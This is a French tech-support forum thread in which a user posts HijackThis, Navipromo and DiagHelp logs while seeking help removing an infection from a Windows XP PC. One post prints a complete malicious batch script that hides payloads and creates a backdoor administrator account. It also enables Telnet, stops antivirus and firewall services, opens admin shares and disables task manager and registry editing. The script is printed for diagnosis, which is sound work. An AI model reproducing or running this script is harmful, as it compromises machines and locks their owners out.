Igniatius

Merci Philipped94, J'ai fait ce que tu m'a conseillé et ça a marché super... Juste une petite précision, je ne sais pas si elle a son importance, mais ça n'a fonctionné qu'une fois l'ordinateur rebooter. Mais bon l'essentiel est que j'ai pu supprimer le fichier "dll" qui m'embêtait et que j'ai retrouvé ma connexion. Encore merci.

Bonjour, J'ai voulu installé le controle parental de chez orange sur l'ordinateur de mon fils croyant naivement que bien que n'étant pas chez ce fournisseur cela marcherait Réalisant mon erreur je l'ai désinstallé. Et depuis on ne peut plus avoir accès à internet avec cet ordinateur. J'ai recherché un peu sur la toile et à priori c'est parce que la désinstallation n'a pas été correctement effectuée ! Effectivement je trouve trace d'un dossier "Controle Parental" à l'intérieur duquel se trouve un dossier "BIN" à l'interieur duquel se trouve un fichier : "lsp.dll" Mon problème c'est que je n'arrive pas à les supprimer. A tout hasard je vous fournis le log effectué : Logfile of HijackThis v1.99.1 Scan saved at 19:34:36, on 09/02/2008 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Hijackthis Version Française\VERSION TRADUITE ORIGINALE.EXE R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.fr/ie R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.fr R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/ R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.fr/keyword/%s R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.google.fr/ R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = R3 - Default URLSearchHook is missing O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe" O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime O4 - HKCU\..\RunOnce: [Config] %systemroot%\system32\run.cmd O4 - HKCU\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" O4 - HKCU\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe O4 - Global Startup: Utilitaire réseau pour SAGEM Wi-Fi 11g USB adapter.lnk = ? O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing) O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing) O23 - Service: Orange Contrôle Parental (OPTENET_FILTER) - Unknown owner - C:\Program Files\Controle Parental\bin\optproxy.exe (file missing) Merci par avance pour votre aide.

Bonjour tout le monde !!! Je suis à la recherche de MALEKAL MORTE qui intervenait sur ce forum. Il a commençait à m'aider à résoudre un problème de sécurité mais je n'ai plus de nouvelles depuis 31 mai 2007. et je suis toujours en rade de micro. J'espère qu'il ne lui ai rien arrivé de grave . Donc voilà si d'aventure vous avez des nouvelles... n'hesitez pas à faire passer pour me rassurer sur son compte et puis, je l'avoue, pour finir de résoudre mon problème qui m'empoisonne l'existence. Au plaisir de vous lire

Personne ?

Bonjour à toutes et à tous Et tout d'abord pour qu'il n'y est pas de malentendu je précise que j'avais ouvert un premier post intitulé "Mon rapport hijackthis" concernant mon problème mais que l'animateur qui m'avait pris en charge ne semble plus présent sur ce forum depuis une vingtaine de jours. Or je commence a avoir réellement besoin de mon ordinateur pour raisons professionnelles. Quelqu'un peut-il prendre la relève ? S'il vous plait !!!!!! Voici les symptomes : Mon ordinateur a rebooté tout seul comme un grand. Au redémarrage, il a créé deux comptes supplémentaires (un nommé "numbers" et l'autre "ADSL") Ces comptes créés sont protégés par un mot de passe. Je ne peux donc pas y avoir accès. Mais surtout ils m'ont "volé" ma qualité de compte administrateur. Je ne peux donc plus gérer grand chose sur mon micro. Pour couronner le tout, je n'arrive plus, non plus, à me connecter à internet via ce micro. Je ne peux donc procéder à aucun scan en ligne. Pour l'accès à ce forum j'utilise un portable branché en réseau chez moi. Le problème c'est que le pc infecté, car je pense ne pas trop m'avancer en disant qu'il est infecté, est l'ordinateur principal du réseau, je ne peux donc pas avoir accès à mon modem pour une mise à jour du firmware par exemple. En vous remerciant de votre attention Sincèrement Igniatius

Y'a plus personne pour me répondre ? Soyez franc et dites le moi si mon cas est désespéré !!!!! Je ne sais plus quoi faire !!!!!!!

Heu... Je me sens seul tout d'un coup Pas de réponse depuis une petite dizaine de jours. J'espère qu'il n'est rien arrivé de grave à Malekal Morte...

Heu... C'est ce que j'ai précisé lors de mon tout premier post. La bécane a redémarré en créant deux comptes protégés par mot de passe (que je ne connais pas, bien sûr!!!). J'ai perdu ma qualité d'administrateur au profit de l'un (ou des deux ) comptes créés. d'où l'amplification du problème...

Je ne peux pas instaler ZoneAlarm. voici le message indiqué : "L'accès pour effectuer les modifications requises sur la configuration du système vous a été refusé. Veuillez recommencer l'installation depuis un compte d'administrateur."

Voilà qui est fait. Et le resultat est que les deux lignes reviennent...

1°/ J'ai bien un fichier C:\WINDOWS\System32\win32 mais y'a pas d'extension bat. C'est celui-là. dans le doute c'est celui que j'ai pris 2°/ En faisant click droit je n'ai pas la mention edition alors j'ai cliqué sur modifié ce qui m'a ouvert le bloc-note 3°/ j'ai donc copié le contenu proposé et c'est ce que je poste ici : @echo off @break off if exist %systemroot%\Lsd.exe goto enx if exist %programfiles%\Taskdrv.exe (goto av) else goto av2 :av if exist %systemroot%\Navnet.exe (goto av3) :av2 attrib -h -s -r %systemroot%\Navnet.exe attrib -h -s %programfiles%\Taskdrv.exe attrib -h -s -r %systemroot%\Win.ini copy SETUP.exe %systemroot%\Navnet.exe copy PLAYER.exe %systemroot%\Navnet.exe copy CRACK.exe %systemroot%\Navnet.exe copy /b "*..exe" %systemroot%\Navnet.exe copy %programfiles%\Taskdrv.exe %systemroot%\Navnet.exe copy %systemroot%\Navnet.exe %programfiles%\Taskdrv.exe cd %systemroot%\ attrib +h +s %programfiles%\Taskdrv.exe attrib +h +s %systemroot%\Navnet.exe echo [Windows] >> Win.ini echo Run = C:\Windows\Navnet.exe >> Win.ini attrib +h +s +r %systemroot%\Win.ini reg add HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f net user nombre ADSL /add net localgroup "Administrador es" ADSL /add reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Firewall /d %Systemroot%\Navnet.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v kis /d %programfiles%\Taskdrv.exe /f ping 127.0.0.1 -n 300 > nul :av3 NET STOP "Centro de Seguridad" NET STOP "Firewall de Windows/Conexión compartida a Internet (ICS)" tskill explorer /a taskkill /f /IM explorer.exe reg add HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f net user ADSL ADSL /add net stop navapsvc net stop NPFMntor net stop ccApp net stop symlcsvc net stop apvxdwin net stop pavProxy net share ADMIN$ net share C$ net share IPC$ net share c=c net share d=d net share e=e reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Firewall /d %Systemroot%\Navnet.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v kis /d %programfiles%\Taskdrv.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Firewall /d %Systemroot%\Navnet.exe /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v kis /d %programfiles%\Taskdrv.exe /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f reg add HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel /v Homepage /t REG_DWORD /d 0 /f reg add HKCU\Software\Microsoft\Internet Explorer\Main /va Start Page /d "http://www.Fuck.com" /f reg add HKCU\Software\Microsoft\Internet Explorer\Main /v Start Page /t REG_MULTI_SZ /D http://www.fUCK.com /f reg add HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel /v Homepage /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 /v 1803 /t REG_DWORD /d 3 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disabletaskmgr /t REG_DWORD /d 1 /f ping 127.0.0.1 -n 100 > nul tskill explorer /a tskill iexplore /a taskkill /f /IM explorer.exe taskkill /f /IM iexplore.exe ping 127.0.0.1 -n 100 > nul start iexplore.exe tskill msnmsgr /a tskill emule /a taskkill /f /IM msnmsgr.exe taskkill /f /IM emule.exe ping 127.0.0.1 -n 100 > nul tskill explorer /a tskill iexplore /a taskkill /f /IM explorer.exe taskkill /f /IM iexplore.exe start iexplore.exe ping 127.0.0.1 -n 90 > nul tskill iexplore /a taskkill /f /IM iexplore.exe start iexplore.exe ping 127.0.0.1 -n 90 > nul tskill explorer /a taskkill /f /IM explorer.exe ping 127.0.0.1 -n 100 > nul tskill svchost /a tskill iexplore /a taskkill /f /IM svchost.exe taskkill /f /IM iexplore.exe goto av3 :enx del /s /q %0 Del /s /q %0 && end C'est ça que tu voulais ?

Bonjour malekal Morte et désolé pour l'absence de news mais pas chez moi ces derniers jours. Bon, reprenons, j'ai suivi tes dernières indications et ben ... rien dechangé. Je peux fixeret avoir accès aux registres grace à fixswen. mais pas de manière définitive. A chaque redémarrage il faut recommencer. J'ai vu sur ton dernier lien un outil de nettoyage du registre nommé JV16 je l'ai installé et lancé mais ça a bloqué avant la fin du scan... voilà les dernières nouvelles Ca veut vraiment pas, hein?

Voilà le rapport de scan AVG antispyware mais tu vas pas être déçu !!! --------------------------------------------------------- AVG Anti-Spyware - Rapport d'analyse --------------------------------------------------------- + Créé à: 13:52:20 19/05/2007 + Résultat de l'analyse: Rien à signaler. Fin du rapport Ca aide pas, hein ?

Bonjour Malekal Morte, voici les news, En ce qui concerne ton indiquation : "Télécharge ce fichier sur ton bureau : http://www.malekal.com/download/Activer_regedit_taskmgr.reg (s'il s'ouvre sur le navigateur, faire un clic droit puis enregistrer la cible du lien sous). Double-clic dessus et accepte l'inscription des données." Ca ne marche pas ! Car lorsque je double clique voici ce qui apparait : Editeur du registre : La modification du Registre a été désactivée par votre administrateur Et pour ce qui est du scan en ligne je ne peux toujours pas me connecter. 1/ Parce que, bien que l'ordinateur détecte mon réseau, il n'arrive pas à se connecter dessus. 2/ Parce que, bien que l'ordinateur ai cessé de redémarrer à tout bout de champ, c'est maintenant au bureau de le faire. Et ça c'est embêtant. 3/ J'ai toujours IE qui se lance, lui aussi n'importe quand ! mais comme il n'y a pas de connexion, il va pas bien loin... Je t'avoue que là, j'ai comme qui dirait un léger coup de mou !!!! J'attends donc ton prochain avis avec impatience. Et j'en profite pour te renouveler mes remerciements pour ton aide.

Bonjour Malekal Morte, voici les 2 rapports navilog1 Voilà le premier : Search Navipromo version 2.0.1 commencé le 17/05/2007 à 17:04:36,57 !!! Attention,ce rapport peut indiquer des fichiers/programmes légitimes!!! !!! Poster ce rapport sur le forum pour le faire analyser !!! !!! Ne pas lancer la partie désinfection sans l'avis d'un spécialiste !!! Fix lancé depuis C:\Program Files\navilog1 Mise a jour le 10.05.2007 a 22h00 by IL-MAFIOSO Executé en mode normal *** Recherche Programmes installes *** *** Recherche dossiers dans C:\WINDOWS *** *** Recherche dossiers dans C:\Program Files *** C:\Program Files\MessengerSkinner trouvé ! *** Recherche dossiers dans C:\Documents and Settings\All Users\Application Data *** *** Recherche dossiers dans C:\Documents and Settings\Pascal\Application Data *** ...\Application Data\MessengerSkinner trouvé ! *** Recherche avec BlackLight Engine/F-secure *** BlackLight Engine est un produit de F-secure, pour + d'infos : http://www.f-secure.com/blacklight/blacklight_help.html F-SECURE BLACKLIGHT ROOTKIT ELIMINATOR ====================================== Copyright 2005-2006 F-Secure Corporation. All rights reserved. This is a beta version. It will expire on 1st of April, 2007. Version information: 2.2.1061. [+] Started on 05/17/07 at 17:04:41. [+] Initializing ... [+] Starting scan, press Ctrl-C to abort. [+] Scanning for hidden items ........................... [-] Scan aborted due to user logoff. [+] Summary: 0 hidden item(s) found, 0 scheduled for renaming. [+] Exited on 05/17/07 at 17:07:44 (return code = 2). *** Recherche fichiers *** C:\WINDOWS\pack.epk trouvé ! C:\WINDOWS\system32\nvs2.inf trouvé ! *** Recherche cles registre *** Recherche dans [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs] Recherche dans [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage] Recherche Clé Magic Control HKEY_CURRENT_USER\Software\Lanconfig trouvé ! HKEY_USERS\S-1-5-21-854245398-920026266-1202660629-1005\Software\Lanconfig trouvé ! *** Module de Recherche complémentaire *** (Recherche fichiers spécifiques) 1)Recherche fichiers connus: 2)Recherche Heuristique : * C:\WINDOWS\system32\rgnepuvwco.dat trouvé ! ** C:\WINDOWS\system32\rgnepuvwco.dat trouvé ! *** **** C:\WINDOWS\system32\rgnepuvwco_navps.dat trouvé ! ***** C:\WINDOWS\system32\rgnepuvwco_nav.dat trouvé ! C:\WINDOWS\system32\rgnepuvwco_navup.dat trouvé ! ****** ******* ******** *** Analyse Terminé le 17/05/2007 à 17:08:57,17 *** et le second : Clean Navipromo version 2.0.1 commencé le 17/05/2007 à 17:16:05,00 Fix lancé depuis C:\Program Files\navilog1 Mise a jour le 10.05.2007 a 22h00 by IL-MAFIOSO Mode suppression par méthode manuelle Nom du fichier saisi : rgnepuvwco *** Recherche, Creation backups et suppression *** C:\WINDOWS\system32\rgnepuvwco.exe absent ! C:\WINDOWS\system32\rgnepuvwco_navtmp.dat absent ! C:\WINDOWS\system32\rgnepuvwco_m2s.xml absent ! C:\WINDOWS\prefetch\rgnepuvwco*.pf absent ! C:\WINDOWS\System32\rgnepuvwco.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco.dat supprimé ! C:\WINDOWS\System32\rgnepuvwco_nav.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco_nav.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco_nav.dat supprimé ! C:\WINDOWS\System32\rgnepuvwco_navps.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco_navps.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco_navps.dat supprimé ! C:\WINDOWS\System32\rgnepuvwco_navup.dat trouvé ! Copie C:\WINDOWS\system32\rgnepuvwco_navup.dat realise avec succes ! C:\WINDOWS\system32\rgnepuvwco_navup.dat supprimé ! *** Suppression dossiers dans C:\WINDOWS *** *** Suppression dossiers dans C:\Program Files *** C:\Program Files\MessengerSkinner ...suppression... C:\Program Files\MessengerSkinner supprimé ! *** Suppression dossiers dans C:\Documents and Settings\All Users\Application Data *** *** Suppression dossiers dans C:\Documents and Settings\Pascal\Application Data *** ...\Application Data\MessengerSkinner ...suppression... ...\Application Data\MessengerSkinner supprimé ! *** Suppression fichiers *** C:\WINDOWS\pack.epk supprimé ! C:\WINDOWS\system32\nvs2.inf supprimé ! *** Suppression fichiers temporaires *** Nettoyage contenu C:\WINDOWS\Temp effectué ! Nettoyage contenu C:\Documents and Settings\Pascal\Local Settings\Temp effectué ! *** Sauvegarde du registre vers dossier Backupnavi*** sauvegarde du registre realise avec succes ! *** Nettoyage registre *** Nettoyage registre Ok *** Traitement Recherche complémentaire *** (Recherche fichiers spécifiques) 1)Recherche fichiers connus: 2)Recherche et Suppression Heuristique : * ** *** **** ***** ****** ******* ******** *** Nettoyage termine le 17/05/2007 à 17:24:55,33 *** A noter (je sais pas si c'est important) lors du redémarrage et avant le deuxieme log, une fenêtre est apparue : Editeur de registre : La modification du registre a été déssactivée par votre administrateur. Encore merci pour ton aide.

Ouais, je sais, je sais, chui comme ça, moi Bon sinon, voilà le rapport diaghelp : DiagHelp version v1.07.4 - http://www.malekal.com excute le 15/05/2007 à 9:28:31,63 Liste des fichiers modifies/crees dans les 24 dernieres heures... C:\Documents and Settings\Administrateur\ntuser.dat.LOG C:\Documents and Settings\Clément\ntuser.dat.LOG C:\Documents and Settings\Emilie\ntuser.dat.LOG C:\Documents and Settings\LocalService\Cookies\index.dat C:\Documents and Settings\LocalService\Local Settings\desktop.ini C:\Documents and Settings\LocalService\NTUSER.DAT C:\Documents and Settings\LocalService\ntuser.dat.LOG C:\Documents and Settings\NetworkService C:\Documents and Settings\NetworkService\Local Settings\desktop.ini C:\Documents and Settings\NetworkService\ntuser.dat.LOG C:\Documents and Settings\Pascal\Bureau C:\Documents and Settings\Pascal\Bureau\catchme.log C:\Documents and Settings\Pascal\Bureau\DiagHelp C:\Documents and Settings\Pascal\Bureau\DiagHelp\temp.txt C:\Documents and Settings\Pascal\Cookies C:\Documents and Settings\Pascal\Cookies\pascal@www.kaspersky[1].txt C:\Documents and Settings\Pascal\Local Settings\desktop.ini C:\Documents and Settings\Pascal\Local Settings\Temp\KAV Updater update files\1065 C:\Documents and Settings\Pascal\NTUSER.DAT C:\Documents and Settings\Pascal\ntuser.ini C:\pagefile.sys C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\error.txt C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\logfile.txt C:\resultat.txt C:\WINDOWS.log C:\WINDOWS\bootstat.dat C:\WINDOWS\Debug\PASSWD.LOG C:\WINDOWS\PCHEALTH\HELPCTR\DataColl C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5806.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5808.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5810.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5812.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5814.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5816.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5817.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5818.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5820.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5822.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5824.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5826.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5827.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5828.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5830.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5832.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5833.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5834.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5835.xml C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\history_db.xml C:\WINDOWS\QTFont.qfn C:\WINDOWS\SchedLgU.Txt C:\WINDOWS\system32\drivers C:\WINDOWS\system32\drivers\fidbox.idx C:\WINDOWS\system32\drivers\fidbox2.idx C:\WINDOWS\system32\drivers\klick.sys C:\WINDOWS\system32\drivers\klin.sys C:\WINDOWS\system32\LVCOMSX.LOG C:\WINDOWS\system32\nvapps.xml C:\WINDOWS\system32\win32.bat C:\WINDOWS\system32\wpa.dbl C:\WINDOWS\Tasks\SA.DAT C:\WINDOWS\Temp\WGAErrLog.txt C:\WINDOWS\Temp\WGANotify.settings C:\WINDOWS\Temp\~DFD5B9.tmp C:\WINDOWS\Temp\~DFD6A7.tmp C:\WINDOWS\Temp\~DFD703.tmp C:\WINDOWS\Temp\~DFD75D.tmp C:\WINDOWS\Temp\~DFDAD6.tmp C:\WINDOWS\wiadebug.log C:\WINDOWS\wiaservc.log Liste des derniers fichies modifies/crees dans windir\system32 C:\WINDOWS\System32/drivers\fidbox2.dat -->15/05/2007 09:38:56 C:\WINDOWS\System32/drivers\fidbox.dat -->15/05/2007 09:34:26 C:\WINDOWS\System32/drivers\fidbox2.idx -->14/05/2007 19:35:54 C:\WINDOWS\System32/drivers\fidbox.idx -->14/05/2007 19:35:52 C:\WINDOWS\System32/drivers\klin.sys -->14/05/2007 18:34:15 C:\WINDOWS\System32/drivers\klick.sys -->14/05/2007 18:34:15 C:\WINDOWS\System32/drivers\ntfs.sys -->09/02/2007 13:10:35 C:\WINDOWS\System32\win32.bat -->15/05/2007 09:27:32 C:\WINDOWS\System32\LVCOMSX.LOG -->15/05/2007 09:27:25 C:\WINDOWS\System32\nvapps.xml -->15/05/2007 09:26:44 C:\WINDOWS\System32\wpa.dbl -->15/05/2007 09:26:11 C:\WINDOWS\System32\MRT.exe -->27/04/2007 22:45:12 C:\WINDOWS\System32\FNTCACHE.DAT -->04/04/2007 10:39:27 C:\WINDOWS\System32\ieapfltr.dll -->03/04/2007 16:29:23 C:\WINDOWS\System32\ieapfltr.dat -->03/04/2007 06:36:20 C:\WINDOWS\System32\lvcoinst.log -->31/03/2007 21:45:30 C:\WINDOWS\System32\rgnepuvwco.dat -->25/03/2007 16:31:57 C:\WINDOWS\System32\perfh00C.dat -->25/03/2007 10:23:57 C:\WINDOWS\System32\perfh009.dat -->25/03/2007 10:23:57 C:\WINDOWS\System32\perfc00C.dat -->25/03/2007 10:23:57 C:\WINDOWS\System32\perfc009.dat -->25/03/2007 10:23:57 C:\WINDOWS\System32\PerfStringBackup.INI -->25/03/2007 10:23:55 C:\WINDOWS\System32\rgnepuvwco_navup.dat -->23/03/2007 17:22:47 C:\WINDOWS\System32\EPPICResdb0000 -->20/03/2007 13:44:51 C:\WINDOWS\System32\EPPICResdb -->20/03/2007 13:44:51 C:\WINDOWS\System32\winsrv.dll -->17/03/2007 15:44:47 C:\WINDOWS\System32\LegitCheckControl.dll -->15/03/2007 18:19:28 C:\WINDOWS\System32\WgaTray.exe -->15/03/2007 18:17:20 C:\WINDOWS\System32\WgaLogon.dll -->15/03/2007 18:16:48 C:\WINDOWS\System32\xpsp3res.dll -->09/03/2007 13:51:20 C:\WINDOWS\System32\user32.dll -->08/03/2007 17:37:50 C:\WINDOWS\System32\mf3216.dll -->08/03/2007 17:37:50 C:\WINDOWS\WindowsUpdate.log -->15/05/2007 09:34:36 C:\WINDOWS\QTFont.qfn -->15/05/2007 09:26:46 C:\WINDOWS.log -->15/05/2007 09:16:14 C:\WINDOWS\wiadebug.log -->15/05/2007 09:15:50 C:\WINDOWS\wiaservc.log -->15/05/2007 09:15:36 C:\WINDOWS\bootstat.dat -->15/05/2007 09:15:14 C:\WINDOWS\SchedLgU.Txt -->14/05/2007 19:35:32 C:\WINDOWS\setupapi.log -->13/05/2007 17:44:03 C:\WINDOWS\ntbtlog.txt -->13/05/2007 16:26:07 C:\WINDOWS\system.ini -->13/05/2007 16:21:01 C:\WINDOWS\QTFont.for -->12/05/2007 15:38:26 C:\WINDOWS\Sti_Trace.log -->12/05/2007 12:10:50 C:\WINDOWS\win.ini -->10/05/2007 15:43:33 C:\WINDOWS\NeroDigital.ini -->10/05/2007 11:28:13 C:\WINDOWS\POSTER.INI -->24/04/2007 15:58:56 Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\WINDOWS\system32 20/08/2004 01:09 6 144 csrss.exe 1 fichier(s) 6 144 octets 0 Rép(s) 3 504 156 672 octets libres Contenu de Downloaded Program Files Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\WINDOWS\Downloaded Program Files 13/05/2007 17:44 <REP> . 13/05/2007 17:44 <REP> .. 10/02/2005 20:27 65 desktop.ini 25/07/2002 18:13 24 576 dwusplay.dll 25/07/2002 18:13 196 608 dwusplay.exe 07/06/2006 11:09 1 249 erma.inf 25/07/2002 18:05 172 032 isusweb.dll 04/03/2005 04:52 752 jinstall-1_5_0_02.inf 08/08/2006 11:45 576 kavwebscan.inf 20/01/2000 15:25 1 162 Microsoft XML Parser for Java.osd 27/03/2006 13:00 5 019 swflash.inf 9 fichier(s) 402 039 octets Total des fichiers listés : 9 fichier(s) 402 039 octets 2 Rép(s) 3 504 156 672 octets libres Recherche de rootkit! (Merci S!Ri) infection possible Magic.Control : un scan F-Secure BlackLight est recommandé Recherche d'infections connues catchme 0.3.660 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net Rootkit scan 2007-05-15 09:47:05 Windows 5.1.2600 Service Pack 2 NTFS scanning hidden processes ... scanning hidden services ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden processes: 0 hidden services: 0 hidden files: 0 Liste des programmes installes 7.9 Active Virus Shield Active Virus Shield Active Virus Shield Ad-Aware SE Personal Ad-Aware SE Personal Adobe Acrobat 5.0 Adobe Acrobat 5.0 Adobe Flash Player 9 ActiveX Adobe Reader 7.0.9 Archiveur WinRAR Atlas mondial Microsoft Encarta 2001 AVG Anti-Spyware 7.5 AVG Anti-Spyware 7.5 Capturino CCleaner (remove only) CCleaner (remove only) Codeur Windows Media Série 9 Codeur Windows Media Série 9 Correctif pour Windows XP (KB914440) Correctif pour Windows XP (KB914440) Correctif Windows XP - KB867282 Correctif Windows XP - KB867282 Correctif Windows XP - KB873333 Correctif Windows XP - KB873333 Correctif Windows XP - KB873339 Correctif Windows XP - KB873339 Correctif Windows XP - KB885250 Correctif Windows XP - KB885250 Correctif Windows XP - KB885835 Correctif Windows XP - KB885835 Correctif Windows XP - KB885836 Correctif Windows XP - KB885836 Correctif Windows XP - KB886185 Correctif Windows XP - KB886185 Correctif Windows XP - KB887472 Correctif Windows XP - KB887472 Correctif Windows XP - KB887742 Correctif Windows XP - KB887742 Correctif Windows XP - KB888113 Correctif Windows XP - KB888113 Correctif Windows XP - KB888302 Correctif Windows XP - KB888302 Correctif Windows XP - KB890047 Correctif Windows XP - KB890047 Correctif Windows XP - KB890175 Correctif Windows XP - KB890175 Correctif Windows XP - KB890859 Correctif Windows XP - KB890859 Correctif Windows XP - KB890923 Correctif Windows XP - KB890923 Correctif Windows XP - KB891781 Correctif Windows XP - KB891781 Correctif Windows XP - KB893066 Correctif Windows XP - KB893066 Correctif Windows XP - KB893086 Correctif Windows XP - KB893086 DartyBox Digital Camera eMule eMule EPSON Attach To Email EPSON Attach To Email EPSON Attach To Email EPSON Copy Utility 3 EPSON Easy Photo Print EPSON File Manager EPSON Image Clip Palette EPSON Logiciel imprimante EPSON Logiciel imprimante EPSON Scan EPSON Scan EPSON Scan Assistant FMS FMS Haali Media Splitter Haali Media Splitter HijackThis 1.99.1 HijackThis 1.99.1 Hijackthis Version Française 1.99.0.1 Hijackthis Version Française 1.99.0.1 Hotfix for Windows Media Format 11 SDK (KB929399) Hotfix for Windows XP (KB909394) Hotfix for Windows XP (KB909394) Hotfix for Windows XP (KB915865) Hotfix for Windows XP (KB915865) Hotfix for Windows XP (KB926239) Icatch(IV) Camera Driver Installation de Microsoft Works Suite 2001 J2SE Runtime Environment 5.0 Update 11 J2SE Runtime Environment 5.0 Update 3 J2SE Runtime Environment 5.0 Update 6 J2SE Runtime Environment 5.0 Update 9 Kaspersky On-line Scanner Kaspersky On-line Scanner Kaspersky Online Scanner Kaspersky Online Scanner L'Assistant DartyBox Language pack for Ad-Aware SE Lecteur Windows Media 11 Logitech Print Service Logitech QuickCam Matroska Pack Microsoft ActiveSync Microsoft Compression Client Pack 1.0 for Windows XP Microsoft DirectX Transform optional components Microsoft DirectX Transform optional components Microsoft Internationalized Domain Names Mitigation APIs Microsoft Internationalized Domain Names Mitigation APIs Microsoft National Language Support Downlevel APIs Microsoft Office Professional Edition 2003 Microsoft Plus! Windows CE, Handheld PC Edition 3.0 Microsoft User-Mode Driver Framework Feature Pack 1.0 Microsoft Works 6.0 Mise à jour de sécurité pour Lecteur Windows Media (KB911564) Mise à jour de sécurité pour Lecteur Windows Media (KB911564) Mise à jour de sécurité pour Lecteur Windows Media 10 (KB911565) Mise à jour de sécurité pour Lecteur Windows Media 10 (KB911565) Mise à jour de sécurité pour Lecteur Windows Media 10 (KB917734) Mise à jour de sécurité pour Lecteur Windows Media 10 (KB917734) Mise à jour de sécurité pour Lecteur Windows Media 6.4 (KB925398) Mise à jour de sécurité pour Windows Internet Explorer 7 (KB928090) Mise à jour de sécurité pour Windows Internet Explorer 7 (KB929969) Mise à jour de sécurité pour Windows Internet Explorer 7 (KB931768) Mise à jour de sécurité pour Windows XP (KB883939) Mise à jour de sécurité pour Windows XP (KB883939) Mise à jour de sécurité pour Windows XP (KB890046) Mise à jour de sécurité pour Windows XP (KB890046) Mise à jour de sécurité pour Windows XP 